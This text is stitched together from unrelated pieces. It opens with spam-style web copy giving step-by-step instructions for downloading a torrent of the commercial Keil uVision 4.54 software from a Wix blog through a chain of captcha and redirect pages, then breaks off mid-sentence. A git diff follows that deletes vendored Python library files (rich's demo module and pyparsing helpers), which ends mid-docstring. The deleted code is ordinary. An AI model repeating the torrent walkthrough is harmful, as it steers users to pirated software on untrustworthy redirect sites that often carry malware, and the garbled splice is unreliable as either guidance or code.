              One of the websites that we recommend is Cumisreto[^1^]. It is a blog that provides torrent files for various software, including Keil Uvision 4.54. To download the torrent file from this website, follow these steps:

              -
                -
              • Go to https://keil-uvision-454-torrent-cumisreto.skyetavano75569t.wixsite.com/cumisreto/post/keil-uvision-4-54-torrent
              • -
              • Click on the "Download File" button at the bottom of the page.
              • -
              • You will be redirected to another page where you need to complete a captcha verification.
              • -
              • After completing the captcha verification, click on the "Continue" button.
              • -
              • You will be redirected to another page where you need to wait for 10 seconds.
              • -
              • After waiting for 10 seconds, click on the "Get Link" button.
              • -
              • You will be redirected to another page where you can see the torrent file name and size.
              • -
              • Click on the "Download" button to save the torrent file to your computer.
              • -
              -

              Step 2: Download and Install the Torrent Client Software

              -

              The next step is to download and install the torrent client software that will allow you to open and download the torrent file that you have saved in the previous step. There are many torrent client software available online, but we recommend using BitTorrent or uTorrent because they are easy to use and widely compatible.

              -

              To download and install BitTorrent or uTorrent, follow these steps:

              -
                -
              • Go to https://www.bittorrent.com/downloads/windows or https://www.utorrent.com/downloads/win, depending on which software you prefer.
              • -
              • Click on the

                e93f5a0c3f
                -
                -
                \ No newline at end of file diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/rich/__main__.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/rich/__main__.py deleted file mode 100644 index 54e6d5e8ab2dceaba2a738d886ffa4129952bbb0..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/rich/__main__.py +++ /dev/null @@ -1,282 +0,0 @@ -import colorsys -import io -from time import process_time - -from pip._vendor.rich import box -from pip._vendor.rich.color import Color -from pip._vendor.rich.console import Console, ConsoleOptions, Group, RenderableType, RenderResult -from pip._vendor.rich.markdown import Markdown -from pip._vendor.rich.measure import Measurement -from pip._vendor.rich.pretty import Pretty -from pip._vendor.rich.segment import Segment -from pip._vendor.rich.style import Style -from pip._vendor.rich.syntax import Syntax -from pip._vendor.rich.table import Table -from pip._vendor.rich.text import Text - - -class ColorBox: - def __rich_console__( - self, console: Console, options: ConsoleOptions - ) -> RenderResult: - for y in range(0, 5): - for x in range(options.max_width): - h = x / options.max_width - l = 0.1 + ((y / 5) * 0.7) - r1, g1, b1 = colorsys.hls_to_rgb(h, l, 1.0) - r2, g2, b2 = colorsys.hls_to_rgb(h, l + 0.7 / 10, 1.0) - bgcolor = Color.from_rgb(r1 * 255, g1 * 255, b1 * 255) - color = Color.from_rgb(r2 * 255, g2 * 255, b2 * 255) - yield Segment("▄", Style(color=color, bgcolor=bgcolor)) - yield Segment.line() - - def __rich_measure__( - self, console: "Console", options: ConsoleOptions - ) -> Measurement: - return Measurement(1, options.max_width) - - -def make_test_card() -> Table: - """Get a renderable that demonstrates a number of features.""" - table = Table.grid(padding=1, pad_edge=True) - table.title = "Rich features" - table.add_column("Feature", no_wrap=True, justify="center", style="bold red") - table.add_column("Demonstration") - - color_table = Table( - box=None, - expand=False, - show_header=False, - show_edge=False, - pad_edge=False, - ) - color_table.add_row( - ( - "✓ [bold green]4-bit color[/]\n" - "✓ [bold blue]8-bit color[/]\n" - "✓ [bold magenta]Truecolor (16.7 million)[/]\n" - "✓ [bold yellow]Dumb terminals[/]\n" - "✓ [bold cyan]Automatic color conversion" - ), - ColorBox(), - ) - - table.add_row("Colors", color_table) - - table.add_row( - "Styles", - "All ansi styles: [bold]bold[/], [dim]dim[/], [italic]italic[/italic], [underline]underline[/], [strike]strikethrough[/], [reverse]reverse[/], and even [blink]blink[/].", - ) - - lorem = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque in metus sed sapien ultricies pretium a at justo. Maecenas luctus velit et auctor maximus." - lorem_table = Table.grid(padding=1, collapse_padding=True) - lorem_table.pad_edge = False - lorem_table.add_row( - Text(lorem, justify="left", style="green"), - Text(lorem, justify="center", style="yellow"), - Text(lorem, justify="right", style="blue"), - Text(lorem, justify="full", style="red"), - ) - table.add_row( - "Text", - Group( - Text.from_markup( - """Word wrap text. Justify [green]left[/], [yellow]center[/], [blue]right[/] or [red]full[/].\n""" - ), - lorem_table, - ), - ) - - def comparison(renderable1: RenderableType, renderable2: RenderableType) -> Table: - table = Table(show_header=False, pad_edge=False, box=None, expand=True) - table.add_column("1", ratio=1) - table.add_column("2", ratio=1) - table.add_row(renderable1, renderable2) - return table - - table.add_row( - "Asian\nlanguage\nsupport", - ":flag_for_china: 该库支持中文,日文和韩文文本!\n:flag_for_japan: ライブラリは中国語、日本語、韓国語のテキストをサポートしています\n:flag_for_south_korea: 이 라이브러리는 중국어, 일본어 및 한국어 텍스트를 지원합니다", - ) - - markup_example = ( - "[bold magenta]Rich[/] supports a simple [i]bbcode[/i]-like [b]markup[/b] for [yellow]color[/], [underline]style[/], and emoji! " - ":+1: :apple: :ant: :bear: :baguette_bread: :bus: " - ) - table.add_row("Markup", markup_example) - - example_table = Table( - show_edge=False, - show_header=True, - expand=False, - row_styles=["none", "dim"], - box=box.SIMPLE, - ) - example_table.add_column("[green]Date", style="green", no_wrap=True) - example_table.add_column("[blue]Title", style="blue") - example_table.add_column( - "[cyan]Production Budget", - style="cyan", - justify="right", - no_wrap=True, - ) - example_table.add_column( - "[magenta]Box Office", - style="magenta", - justify="right", - no_wrap=True, - ) - example_table.add_row( - "Dec 20, 2019", - "Star Wars: The Rise of Skywalker", - "$275,000,000", - "$375,126,118", - ) - example_table.add_row( - "May 25, 2018", - "[b]Solo[/]: A Star Wars Story", - "$275,000,000", - "$393,151,347", - ) - example_table.add_row( - "Dec 15, 2017", - "Star Wars Ep. VIII: The Last Jedi", - "$262,000,000", - "[bold]$1,332,539,889[/bold]", - ) - example_table.add_row( - "May 19, 1999", - "Star Wars Ep. [b]I[/b]: [i]The phantom Menace", - "$115,000,000", - "$1,027,044,677", - ) - - table.add_row("Tables", example_table) - - code = '''\ -def iter_last(values: Iterable[T]) -> Iterable[Tuple[bool, T]]: - """Iterate and generate a tuple with a flag for last value.""" - iter_values = iter(values) - try: - previous_value = next(iter_values) - except StopIteration: - return - for value in iter_values: - yield False, previous_value - previous_value = value - yield True, previous_value''' - - pretty_data = { - "foo": [ - 3.1427, - ( - "Paul Atreides", - "Vladimir Harkonnen", - "Thufir Hawat", - ), - ], - "atomic": (False, True, None), - } - table.add_row( - "Syntax\nhighlighting\n&\npretty\nprinting", - comparison( - Syntax(code, "python3", line_numbers=True, indent_guides=True), - Pretty(pretty_data, indent_guides=True), - ), - ) - - markdown_example = """\ -# Markdown - -Supports much of the *markdown* __syntax__! - -- Headers -- Basic formatting: **bold**, *italic*, `code` -- Block quotes -- Lists, and more... - """ - table.add_row( - "Markdown", comparison("[cyan]" + markdown_example, Markdown(markdown_example)) - ) - - table.add_row( - "+more!", - """Progress bars, columns, styled logging handler, tracebacks, etc...""", - ) - return table - - -if __name__ == "__main__": # pragma: no cover - - console = Console( - file=io.StringIO(), - force_terminal=True, - ) - test_card = make_test_card() - - # Print once to warm cache - start = process_time() - console.print(test_card) - pre_cache_taken = round((process_time() - start) * 1000.0, 1) - - console.file = io.StringIO() - - start = process_time() - console.print(test_card) - taken = round((process_time() - start) * 1000.0, 1) - - c = Console(record=True) - c.print(test_card) - # c.save_svg( - # path="/Users/darrenburns/Library/Application Support/JetBrains/PyCharm2021.3/scratches/svg_export.svg", - # title="Rich can export to SVG", - # ) - - print(f"rendered in {pre_cache_taken}ms (cold cache)") - print(f"rendered in {taken}ms (warm cache)") - - from pip._vendor.rich.panel import Panel - - console = Console() - - sponsor_message = Table.grid(padding=1) - sponsor_message.add_column(style="green", justify="right") - sponsor_message.add_column(no_wrap=True) - - sponsor_message.add_row( - "Textualize", - "[u blue link=https://github.com/textualize]https://github.com/textualize", - ) - sponsor_message.add_row( - "Buy devs a :coffee:", - "[u blue link=https://ko-fi.com/textualize]https://ko-fi.com/textualize", - ) - sponsor_message.add_row( - "Twitter", - "[u blue link=https://twitter.com/willmcgugan]https://twitter.com/willmcgugan", - ) - - intro_message = Text.from_markup( - """\ -We hope you enjoy using Rich! - -Rich is maintained with [red]:heart:[/] by [link=https://www.textualize.io]Textualize.io[/] - -- Will McGugan""" - ) - - message = Table.grid(padding=2) - message.add_column() - message.add_column(no_wrap=True) - message.add_row(intro_message, sponsor_message) - - console.print( - Panel.fit( - message, - box=box.ROUNDED, - padding=(1, 2), - title="[b red]Thanks for trying out Rich!", - border_style="bright_blue", - ), - justify="center", - ) diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_vendor/pyparsing/helpers.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_vendor/pyparsing/helpers.py deleted file mode 100644 index be8a3657884806a8e7bf5e8e338b3fc86eeffa5b..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_vendor/pyparsing/helpers.py +++ /dev/null @@ -1,1083 +0,0 @@ -# helpers.py -import html.entities -import re - -from . import __diag__ -from .core import * -from .util import _bslash, _flatten, _escape_regex_range_chars - - -# -# global helpers -# -def delimited_list( - expr: Union[str, ParserElement], - delim: Union[str, ParserElement] = ",", - combine: bool = False, - min: OptionalType[int] = None, - max: OptionalType[int] = None, - *, - allow_trailing_delim: bool = False, -) -> ParserElement: - """Helper to define a delimited list of expressions - the delimiter - defaults to ','. By default, the list elements and delimiters can - have intervening whitespace, and comments, but this can be - overridden by passing ``combine=True`` in the constructor. If - ``combine`` is set to ``True``, the matching tokens are - returned as a single token string, with the delimiters included; - otherwise, the matching tokens are returned as a list of tokens, - with the delimiters suppressed. - - If ``allow_trailing_delim`` is set to True, then the list may end with - a delimiter. - - Example:: - - delimited_list(Word(alphas)).parse_string("aa,bb,cc") # -> ['aa', 'bb', 'cc'] - delimited_list(Word(hexnums), delim=':', combine=True).parse_string("AA:BB:CC:DD:EE") # -> ['AA:BB:CC:DD:EE'] - """ - if isinstance(expr, str_type): - expr = ParserElement._literalStringClass(expr) - - dlName = "{expr} [{delim} {expr}]...{end}".format( - expr=str(expr.copy().streamline()), - delim=str(delim), - end=" [{}]".format(str(delim)) if allow_trailing_delim else "", - ) - - if not combine: - delim = Suppress(delim) - - if min is not None: - if min < 1: - raise ValueError("min must be greater than 0") - min -= 1 - if max is not None: - if min is not None and max <= min: - raise ValueError("max must be greater than, or equal to min") - max -= 1 - delimited_list_expr = expr + (delim + expr)[min, max] - - if allow_trailing_delim: - delimited_list_expr += Opt(delim) - - if combine: - return Combine(delimited_list_expr).set_name(dlName) - else: - return delimited_list_expr.set_name(dlName) - - -def counted_array( - expr: ParserElement, - int_expr: OptionalType[ParserElement] = None, - *, - intExpr: OptionalType[ParserElement] = None, -) -> ParserElement: - """Helper to define a counted list of expressions. - - This helper defines a pattern of the form:: - - integer expr expr expr... - - where the leading integer tells how many expr expressions follow. - The matched tokens returns the array of expr tokens as a list - the - leading count token is suppressed. - - If ``int_expr`` is specified, it should be a pyparsing expression - that produces an integer value. - - Example:: - - counted_array(Word(alphas)).parse_string('2 ab cd ef') # -> ['ab', 'cd'] - - # in this parser, the leading integer value is given in binary, - # '10' indicating that 2 values are in the array - binary_constant = Word('01').set_parse_action(lambda t: int(t[0], 2)) - counted_array(Word(alphas), int_expr=binary_constant).parse_string('10 ab cd ef') # -> ['ab', 'cd'] - - # if other fields must be parsed after the count but before the - # list items, give the fields results names and they will - # be preserved in the returned ParseResults: - count_with_metadata = integer + Word(alphas)("type") - typed_array = counted_array(Word(alphanums), int_expr=count_with_metadata)("items") - result = typed_array.parse_string("3 bool True True False") - print(result.dump()) - - # prints - # ['True', 'True', 'False'] - # - items: ['True', 'True', 'False'] - # - type: 'bool' - """ - intExpr = intExpr or int_expr - array_expr = Forward() - - def count_field_parse_action(s, l, t): - nonlocal array_expr - n = t[0] - array_expr <<= (expr * n) if n else Empty() - # clear list contents, but keep any named results - del t[:] - - if intExpr is None: - intExpr = Word(nums).set_parse_action(lambda t: int(t[0])) - else: - intExpr = intExpr.copy() - intExpr.set_name("arrayLen") - intExpr.add_parse_action(count_field_parse_action, call_during_try=True) - return (intExpr + array_expr).set_name("(len) " + str(expr) + "...") - - -def match_previous_literal(expr: ParserElement) -> ParserElement: - """Helper to define an expression that is indirectly defined from - the tokens matched in a previous expression, that is, it looks for - a 'repeat' of a previous expression. For example:: - - first = Word(nums) - second = match_previous_literal(first) - match_expr = first + ":" + second - - will match ``"1:1"``, but not ``"1:2"``. Because this - matches a previous literal, will also match the leading - ``"1:1"`` in ``"1:10"``. If this is not desired, use - :class:`match_previous_expr`. Do *not* use with packrat parsing - enabled. - """ - rep = Forward() - - def copy_token_to_repeater(s, l, t): - if t: - if len(t) == 1: - rep << t[0] - else: - # flatten t tokens - tflat = _flatten(t.as_list()) - rep << And(Literal(tt) for tt in tflat) - else: - rep << Empty() - - expr.add_parse_action(copy_token_to_repeater, callDuringTry=True) - rep.set_name("(prev) " + str(expr)) - return rep - - -def match_previous_expr(expr: ParserElement) -> ParserElement: - """Helper to define an expression that is indirectly defined from - the tokens matched in a previous expression, that is, it looks for - a 'repeat' of a previous expression. For example:: - - first = Word(nums) - second = match_previous_expr(first) - match_expr = first + ":" + second - - will match ``"1:1"``, but not ``"1:2"``. Because this - matches by expressions, will *not* match the leading ``"1:1"`` - in ``"1:10"``; the expressions are evaluated first, and then - compared, so ``"1"`` is compared with ``"10"``. Do *not* use - with packrat parsing enabled. - """ - rep = Forward() - e2 = expr.copy() - rep <<= e2 - - def copy_token_to_repeater(s, l, t): - matchTokens = _flatten(t.as_list()) - - def must_match_these_tokens(s, l, t): - theseTokens = _flatten(t.as_list()) - if theseTokens != matchTokens: - raise ParseException( - s, l, "Expected {}, found{}".format(matchTokens, theseTokens) - ) - - rep.set_parse_action(must_match_these_tokens, callDuringTry=True) - - expr.add_parse_action(copy_token_to_repeater, callDuringTry=True) - rep.set_name("(prev) " + str(expr)) - return rep - - -def one_of( - strs: Union[IterableType[str], str], - caseless: bool = False, - use_regex: bool = True, - as_keyword: bool = False, - *, - useRegex: bool = True, - asKeyword: bool = False, -) -> ParserElement: - """Helper to quickly define a set of alternative :class:`Literal` s, - and makes sure to do longest-first testing when there is a conflict, - regardless of the input order, but returns - a :class:`MatchFirst` for best performance. - - Parameters: - - - ``strs`` - a string of space-delimited literals, or a collection of - string literals - - ``caseless`` - treat all literals as caseless - (default= ``False``) - - ``use_regex`` - as an optimization, will - generate a :class:`Regex` object; otherwise, will generate - a :class:`MatchFirst` object (if ``caseless=True`` or ``asKeyword=True``, or if - creating a :class:`Regex` raises an exception) - (default= ``True``) - - ``as_keyword`` - enforce :class:`Keyword`-style matching on the - generated expressions - (default= ``False``) - - ``asKeyword`` and ``useRegex`` are retained for pre-PEP8 compatibility, - but will be removed in a future release - - Example:: - - comp_oper = one_of("< = > <= >= !=") - var = Word(alphas) - number = Word(nums) - term = var | number - comparison_expr = term + comp_oper + term - print(comparison_expr.search_string("B = 12 AA=23 B<=AA AA>12")) - - prints:: - - [['B', '=', '12'], ['AA', '=', '23'], ['B', '<=', 'AA'], ['AA', '>', '12']] - """ - asKeyword = asKeyword or as_keyword - useRegex = useRegex and use_regex - - if ( - isinstance(caseless, str_type) - and __diag__.warn_on_multiple_string_args_to_oneof - ): - warnings.warn( - "More than one string argument passed to one_of, pass" - " choices as a list or space-delimited string", - stacklevel=2, - ) - - if caseless: - isequal = lambda a, b: a.upper() == b.upper() - masks = lambda a, b: b.upper().startswith(a.upper()) - parseElementClass = CaselessKeyword if asKeyword else CaselessLiteral - else: - isequal = lambda a, b: a == b - masks = lambda a, b: b.startswith(a) - parseElementClass = Keyword if asKeyword else Literal - - symbols: List[str] = [] - if isinstance(strs, str_type): - symbols = strs.split() - elif isinstance(strs, Iterable): - symbols = list(strs) - else: - raise TypeError("Invalid argument to one_of, expected string or iterable") - if not symbols: - return NoMatch() - - # reorder given symbols to take care to avoid masking longer choices with shorter ones - # (but only if the given symbols are not just single characters) - if any(len(sym) > 1 for sym in symbols): - i = 0 - while i < len(symbols) - 1: - cur = symbols[i] - for j, other in enumerate(symbols[i + 1 :]): - if isequal(other, cur): - del symbols[i + j + 1] - break - elif masks(cur, other): - del symbols[i + j + 1] - symbols.insert(i, other) - break - else: - i += 1 - - if useRegex: - re_flags: int = re.IGNORECASE if caseless else 0 - - try: - if all(len(sym) == 1 for sym in symbols): - # symbols are just single characters, create range regex pattern - patt = "[{}]".format( - "".join(_escape_regex_range_chars(sym) for sym in symbols) - ) - else: - patt = "|".join(re.escape(sym) for sym in symbols) - - # wrap with \b word break markers if defining as keywords - if asKeyword: - patt = r"\b(?:{})\b".format(patt) - - ret = Regex(patt, flags=re_flags).set_name(" | ".join(symbols)) - - if caseless: - # add parse action to return symbols as specified, not in random - # casing as found in input string - symbol_map = {sym.lower(): sym for sym in symbols} - ret.add_parse_action(lambda s, l, t: symbol_map[t[0].lower()]) - - return ret - - except re.error: - warnings.warn( - "Exception creating Regex for one_of, building MatchFirst", stacklevel=2 - ) - - # last resort, just use MatchFirst - return MatchFirst(parseElementClass(sym) for sym in symbols).set_name( - " | ".join(symbols) - ) - - -def dict_of(key: ParserElement, value: ParserElement) -> ParserElement: - """Helper to easily and clearly define a dictionary by specifying - the respective patterns for the key and value. Takes care of - defining the :class:`Dict`, :class:`ZeroOrMore`, and - :class:`Group` tokens in the proper order. The key pattern - can include delimiting markers or punctuation, as long as they are - suppressed, thereby leaving the significant key text. The value - pattern can include named results, so that the :class:`Dict` results - can include named token fields. - - Example:: - - text = "shape: SQUARE posn: upper left color: light blue texture: burlap" - attr_expr = (label + Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join)) - print(OneOrMore(attr_expr).parse_string(text).dump()) - - attr_label = label - attr_value = Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join) - - # similar to Dict, but simpler call format - result = dict_of(attr_label, attr_value).parse_string(text) - print(result.dump()) - print(result['shape']) - print(result.shape) # object attribute access works too - print(result.as_dict()) - - prints:: - - [['shape', 'SQUARE'], ['posn', 'upper left'], ['color', 'light blue'], ['texture', 'burlap']] - - color: 'light blue' - - posn: 'upper left' - - shape: 'SQUARE' - - texture: 'burlap' - SQUARE - SQUARE - {'color': 'light blue', 'shape': 'SQUARE', 'posn': 'upper left', 'texture': 'burlap'} - """ - return Dict(OneOrMore(Group(key + value))) - - -def original_text_for( - expr: ParserElement, as_string: bool = True, *, asString: bool = True -) -> ParserElement: - """Helper to return the original, untokenized text for a given - expression. Useful to restore the parsed fields of an HTML start - tag into the raw tag text itself, or to revert separate tokens with - intervening whitespace back to the original matching input text. By - default, returns astring containing the original parsed text. - - If the optional ``as_string`` argument is passed as - ``False``, then the return value is - a :class:`ParseResults` containing any results names that - were originally matched, and a single token containing the original - matched text from the input string. So if the expression passed to - :class:`original_text_for` contains expressions with defined - results names, you must set ``as_string`` to ``False`` if you - want to preserve those results name values. - - The ``asString`` pre-PEP8 argument is retained for compatibility, - but will be removed in a future release. - - Example:: - - src = "this is test bold text normal text " - for tag in ("b", "i"): - opener, closer = make_html_tags(tag) - patt = original_text_for(opener + SkipTo(closer) + closer) - print(patt.search_string(src)[0]) - - prints:: - - [' bold text '] - ['text'] - """ - asString = asString and as_string - - locMarker = Empty().set_parse_action(lambda s, loc, t: loc) - endlocMarker = locMarker.copy() - endlocMarker.callPreparse = False - matchExpr = locMarker("_original_start") + expr + endlocMarker("_original_end") - if asString: - extractText = lambda s, l, t: s[t._original_start : t._original_end] - else: - - def extractText(s, l, t): - t[:] = [s[t.pop("_original_start") : t.pop("_original_end")]] - - matchExpr.set_parse_action(extractText) - matchExpr.ignoreExprs = expr.ignoreExprs - matchExpr.suppress_warning(Diagnostics.warn_ungrouped_named_tokens_in_collection) - return matchExpr - - -def ungroup(expr: ParserElement) -> ParserElement: - """Helper to undo pyparsing's default grouping of And expressions, - even if all but one are non-empty. - """ - return TokenConverter(expr).add_parse_action(lambda t: t[0]) - - -def locatedExpr(expr: ParserElement) -> ParserElement: - """ - (DEPRECATED - future code should use the Located class) - Helper to decorate a returned token with its starting and ending - locations in the input string. - - This helper adds the following results names: - - - ``locn_start`` - location where matched expression begins - - ``locn_end`` - location where matched expression ends - - ``value`` - the actual parsed results - - Be careful if the input text contains ```` characters, you - may want to call :class:`ParserElement.parseWithTabs` - - Example:: - - wd = Word(alphas) - for match in locatedExpr(wd).searchString("ljsdf123lksdjjf123lkkjj1222"): - print(match) - - prints:: - - [[0, 'ljsdf', 5]] - [[8, 'lksdjjf', 15]] - [[18, 'lkkjj', 23]] - """ - locator = Empty().set_parse_action(lambda ss, ll, tt: ll) - return Group( - locator("locn_start") - + expr("value") - + locator.copy().leaveWhitespace()("locn_end") - ) - - -def nested_expr( - opener: Union[str, ParserElement] = "(", - closer: Union[str, ParserElement] = ")", - content: OptionalType[ParserElement] = None, - ignore_expr: ParserElement = quoted_string(), - *, - ignoreExpr: ParserElement = quoted_string(), -) -> ParserElement: - """Helper method for defining nested lists enclosed in opening and - closing delimiters (``"("`` and ``")"`` are the default). - - Parameters: - - ``opener`` - opening character for a nested list - (default= ``"("``); can also be a pyparsing expression - - ``closer`` - closing character for a nested list - (default= ``")"``); can also be a pyparsing expression - - ``content`` - expression for items within the nested lists - (default= ``None``) - - ``ignore_expr`` - expression for ignoring opening and closing delimiters - (default= :class:`quoted_string`) - - ``ignoreExpr`` - this pre-PEP8 argument is retained for compatibility - but will be removed in a future release - - If an expression is not provided for the content argument, the - nested expression will capture all whitespace-delimited content - between delimiters as a list of separate values. - - Use the ``ignore_expr`` argument to define expressions that may - contain opening or closing characters that should not be treated as - opening or closing characters for nesting, such as quoted_string or - a comment expression. Specify multiple expressions using an - :class:`Or` or :class:`MatchFirst`. The default is - :class:`quoted_string`, but if no expressions are to be ignored, then - pass ``None`` for this argument. - - Example:: - - data_type = one_of("void int short long char float double") - decl_data_type = Combine(data_type + Opt(Word('*'))) - ident = Word(alphas+'_', alphanums+'_') - number = pyparsing_common.number - arg = Group(decl_data_type + ident) - LPAR, RPAR = map(Suppress, "()") - - code_body = nested_expr('{', '}', ignore_expr=(quoted_string | c_style_comment)) - - c_function = (decl_data_type("type") - + ident("name") - + LPAR + Opt(delimited_list(arg), [])("args") + RPAR - + code_body("body")) - c_function.ignore(c_style_comment) - - source_code = ''' - int is_odd(int x) { - return (x%2); - } - - int dec_to_hex(char hchar) { - if (hchar >= '0' && hchar <= '9') { - return (ord(hchar)-ord('0')); - } else { - return (10+ord(hchar)-ord('A')); - } - } - ''' - for func in c_function.search_string(source_code): - print("%(name)s (%(type)s) args: %(args)s" % func) - - - prints:: - - is_odd (int) args: [['int', 'x']] - dec_to_hex (int) args: [['char', 'hchar']] - """ - if ignoreExpr != ignore_expr: - ignoreExpr = ignore_expr if ignoreExpr == quoted_string() else ignoreExpr - if opener == closer: - raise ValueError("opening and closing strings cannot be the same") - if content is None: - if isinstance(opener, str_type) and isinstance(closer, str_type): - if len(opener) == 1 and len(closer) == 1: - if ignoreExpr is not None: - content = Combine( - OneOrMore( - ~ignoreExpr - + CharsNotIn( - opener + closer + ParserElement.DEFAULT_WHITE_CHARS, - exact=1, - ) - ) - ).set_parse_action(lambda t: t[0].strip()) - else: - content = empty.copy() + CharsNotIn( - opener + closer + ParserElement.DEFAULT_WHITE_CHARS - ).set_parse_action(lambda t: t[0].strip()) - else: - if ignoreExpr is not None: - content = Combine( - OneOrMore( - ~ignoreExpr - + ~Literal(opener) - + ~Literal(closer) - + CharsNotIn(ParserElement.DEFAULT_WHITE_CHARS, exact=1) - ) - ).set_parse_action(lambda t: t[0].strip()) - else: - content = Combine( - OneOrMore( - ~Literal(opener) - + ~Literal(closer) - + CharsNotIn(ParserElement.DEFAULT_WHITE_CHARS, exact=1) - ) - ).set_parse_action(lambda t: t[0].strip()) - else: - raise ValueError( - "opening and closing arguments must be strings if no content expression is given" - ) - ret = Forward() - if ignoreExpr is not None: - ret <<= Group( - Suppress(opener) + ZeroOrMore(ignoreExpr | ret | content) + Suppress(closer) - ) - else: - ret <<= Group(Suppress(opener) + ZeroOrMore(ret | content) + Suppress(closer)) - ret.set_name("nested %s%s expression" % (opener, closer)) - return ret - - -def _makeTags(tagStr, xml, suppress_LT=Suppress("<"), suppress_GT=Suppress(">")): - """Internal helper to construct opening and closing tag expressions, given a tag name""" - if isinstance(tagStr, str_type): - resname = tagStr - tagStr = Keyword(tagStr, caseless=not xml) - else: - resname = tagStr.name - - tagAttrName = Word(alphas, alphanums + "_-:") - if xml: - tagAttrValue = dbl_quoted_string.copy().set_parse_action(remove_quotes) - openTag = ( - suppress_LT - + tagStr("tag") - + Dict(ZeroOrMore(Group(tagAttrName + Suppress("=") + tagAttrValue))) - + Opt("/", default=[False])("empty").set_parse_action( - lambda s, l, t: t[0] == "/" - ) - + suppress_GT - ) - else: - tagAttrValue = quoted_string.copy().set_parse_action(remove_quotes) | Word( - printables, exclude_chars=">" - ) - openTag = ( - suppress_LT - + tagStr("tag") - + Dict( - ZeroOrMore( - Group( - tagAttrName.set_parse_action(lambda t: t[0].lower()) - + Opt(Suppress("=") + tagAttrValue) - ) - ) - ) - + Opt("/", default=[False])("empty").set_parse_action( - lambda s, l, t: t[0] == "/" - ) - + suppress_GT - ) - closeTag = Combine(Literal("", adjacent=False) - - openTag.set_name("<%s>" % resname) - # add start results name in parse action now that ungrouped names are not reported at two levels - openTag.add_parse_action( - lambda t: t.__setitem__( - "start" + "".join(resname.replace(":", " ").title().split()), t.copy() - ) - ) - closeTag = closeTag( - "end" + "".join(resname.replace(":", " ").title().split()) - ).set_name("" % resname) - openTag.tag = resname - closeTag.tag = resname - openTag.tag_body = SkipTo(closeTag()) - return openTag, closeTag - - -def make_html_tags( - tag_str: Union[str, ParserElement] -) -> Tuple[ParserElement, ParserElement]: - """Helper to construct opening and closing tag expressions for HTML, - given a tag name. Matches tags in either upper or lower case, - attributes with namespaces and with quoted or unquoted values. - - Example:: - - text = '
    More info at the pyparsing wiki page